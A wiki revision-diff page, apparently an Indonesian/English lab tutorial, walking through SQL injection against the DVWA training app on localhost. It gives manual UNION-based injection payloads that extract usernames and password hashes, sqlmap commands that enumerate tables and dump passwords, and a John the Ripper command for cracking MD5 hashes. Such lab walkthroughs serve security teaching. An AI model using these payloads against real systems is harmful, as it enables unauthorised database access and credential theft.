Difference between revisions of "DVWA: SQLi blind"

From OnnoWiki
Jump to navigation Jump to search
Line 39: Line 39:
 
OK GOOD LUCK
 
OK GOOD LUCK
  
Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.
+
==Exploit DVWA menggunakan SQLmap==
  
1. afer login in DVWA and choose DVWA Securty Low
+
* Login ke DVWA
2. follow this picture
+
* Pilih DVWA Security Low
 
+
* Pada user ID tulis '1
In User ID write '1
+
* Jalankan addon tamer di browser
 
+
* Lakukan di terminal,
than show
 
 
 
Lakukan di terminal,
 
  
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
Line 56: Line 53:
 
di peroleh dari addon tamer di browser.
 
di peroleh dari addon tamer di browser.
  
lihat tables
+
* lihat tables
  
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  
lihat kolom di user tabel
+
* lihat kolom di user tabel
 
 
  
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  
lihat field password & dump
+
* lihat field password & dump
  
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Revision as of 07:45, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level

1. Open Local host http://localhost/dvwa 

Username :  Admin
Password : Password

3.Select SQL Injection BLIND and column ID issued 

1' and 1=1#
1' and 1=1 order by 2 #

5.ID: 'or' 1=1--

we can see there are 5 user

5. now see information table 

1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #

7. Information table name from table user 

1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #

8. on the last lets see user name and password 

1' and 1=0 union select null,concat(first_name,0x0a,password) from users #

9. we will crack the md5 password 

copy the passowrd into kwrite and save with name hash
next



root@bt:/pentest/passwords/john#./john --format=raw-md5 hash


OK GOOD LUCK

Exploit DVWA menggunakan SQLmap

  • Login ke DVWA
  • Pilih DVWA Security Low
  • Pada user ID tulis '1
  • Jalankan addon tamer di browser
  • Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

  • lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  • lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  • lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump


Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=DVWA:_SQLi_blind&oldid=47177"